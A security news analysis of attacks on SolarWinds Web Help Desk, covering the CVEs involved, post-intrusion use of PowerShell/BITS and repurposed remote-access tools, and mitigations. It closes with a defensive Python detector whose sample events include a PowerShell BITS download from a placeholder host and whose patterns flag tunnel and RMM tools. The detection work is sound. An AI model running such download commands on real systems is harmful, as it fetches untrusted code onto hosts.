
SolarWinds Web Help Desk Vulnerabilities and Exposure Management

Recent findings indicate active utilization of vulnerabilities in SolarWinds Web Help Desk. This analysis covers observed intrusion techniques, including the use of legitimate administrative tools for persistence, and outlines essential mitigation strategies for securing exposed instances.

Triage Security Media Team

Malicious actors are actively targeting vulnerabilities in the SolarWinds Web Help Desk (WHD) platform, emphasizing the critical need for solid application security and network segmentation. WHD, widely used for IT support and asset management, has recently been the subject of multiple security alerts regarding flaws that allow unauthorized access.

The US Cybersecurity and Infrastructure Security Agency (CISA) recently added CVE-2025-40551, a critical deserialization flaw, to its Known Exploited Vulnerabilities (KEV) Catalog. This vulnerability was disclosed alongside several others in late January. While the specific entry vector for recent intrusions varies, the presence of these vulnerabilities in internet-facing applications presents a significant risk to organizations.

Analysis of Observed Intrusion Techniques

Microsoft has reported observing multistage intrusions targeting WHD instances. Due to overlapping vulnerability windows, it remains technically difficult to confirm whether the initial access point was the recently disclosed CVE-2025-40551 or older flaws such as CVE-2025-26399. The latter is a remote code execution flaw disclosed in September 2025, which served as a bypass for previous patches. Microsoft noted that because intrusions occurred on systems susceptible to multiple CVEs simultaneously, the exact initial foothold could not be definitively isolated.

Regardless of the specific vulnerability leveraged, the post-intrusion methodology follows a consistent pattern. Threat actors are employing "living-off-the-land" (LotL) techniques—using pre-existing system tools to conduct operations—alongside legitimate administrative software to maintain persistence and move laterally.

Research indicates that once unauthorized access is gained, the compromised WHD service may initiate PowerShell processes to utilize the Background Intelligent Transfer Service (BITS) for downloading additional tools. Microsoft’s analysis highlights that a single exposed application can serve as a gateway to broader domain compromise if not adequately monitored or patched.

Tool Repurposing and Persistence

Further analysis by Huntress corroborates these findings. In observed incidents, unauthorized parties deployed legitimate software to establish command and control (C2) channels. Specifically, the following tools have been identified in these campaigns:

  • Zoho ManageEngine and Zoho Meetings: Used for lateral movement and persistence.

  • Cloudflare Tunnels: Deployed rapidly after initial access to maintain connectivity.

  • Velociraptor: A digital forensics and incident response (DFIR) tool repurposed for C2.

The use of Velociraptor is notable. While typically a defensive tool, it was previously observed in October 2025 being utilized by the threat group Storm-2603 for ransomware operations. Huntress analysts note that internet exposure of WHD administrative interfaces significantly lowers the barrier for entry, allowing actors to discover targets at scale without requiring a prior foothold.

According to data from the Shadowserver Foundation, scans for CVE-2025-40551 have identified approximately 170 WHD instances that remain vulnerable and exposed to the public internet.

Mitigation and Defensive Strategies

Securing SolarWinds WHD instances requires a combination of immediate patching and structural network changes.

Network Segmentation and Access Control

The most effective preventative measure is to remove direct internet access to WHD administrative interfaces. Placing these instances behind firewalls or requiring VPN access reduces the surface area available for broad-scope targeting.

Patch Management

Organizations should verify their WHD installation is updated to version 2026.1 or later. This release addresses the identified critical vulnerabilities.

Credential Rotation and Auditing

Given the potential for credential theft during these intrusions, security teams should rotate credentials for WHD service accounts, administrator accounts, and any other identities accessible through the platform.

Environment Review

Security teams should conduct a thorough review of hosts running WHD for unauthorized remote access software. Specifically, the presence of Zoho Assist, Velociraptor, or unexpected Cloudflare tunnel configurations should be investigated immediately. Microsoft also advises removing unapproved remote monitoring and management (RMM) tools from the network to prevent their misuse.
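As an added illustration of the environment review and of the WHD-to-PowerShell-to-BITS chain described earlier (example code written for this page, not code from the article, SolarWinds, Microsoft or Huntress), the following Python sketch applies those behavioural indicators to constructed Sysmon-style process-creation records. The WHD install path, the tool binary names and the sample events are assumptions, and any match still has to be checked against the organization's approved-software list.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# Assumption: WHD runs under a Java process installed beneath a "WebHelpDesk" folder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Start-BitsTransfer -Source http://placeholder.example/t.bin -Destination C:\Windows\Temp\t.bin"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\cloudflared\cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "cmdline": "velociraptor.exe client"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Indicators taken from the behaviour described in the article.
WHD_PARENT = re.compile(r"webhelpdesk", re.I)          # assumed install folder
SHELL_IMAGE = re.compile(r"\\(powershell|pwsh|cmd)\.exe$", re.I)
BITS_USE = re.compile(r"start-bitstransfer|bitsadmin", re.I)
# Binary names are assumptions; the Zoho Assist agent is matched loosely on "zoho".
RMM_OR_TUNNEL = re.compile(r"\\(cloudflared|velociraptor|zoho)[^\\]*\.exe$", re.I)


def classify(event, approved=frozenset()):
    """Return the finding labels raised by one process-creation record."""
    findings = []
    parent, image, cmd = event["parent"], event["image"], event["cmdline"]
    # The WHD service itself should never need to launch an interactive shell.
    if WHD_PARENT.search(parent) and SHELL_IMAGE.search(image):
        findings.append("whd-spawned-shell")
        if BITS_USE.search(cmd):
            findings.append("bits-download-from-whd")
    # Tunnel/RMM binaries are only a finding when not on the approved list.
    m = RMM_OR_TUNNEL.search(image)
    if m and m.group(1).lower() not in approved:
        findings.append(f"unapproved-tool:{m.group(1).lower()}")
    return findings


def scan(events, approved=frozenset()):
    """Map record index -> findings for every record that triggered a rule."""
    return {i: f for i, e in enumerate(events) if (f := classify(e, approved))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```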
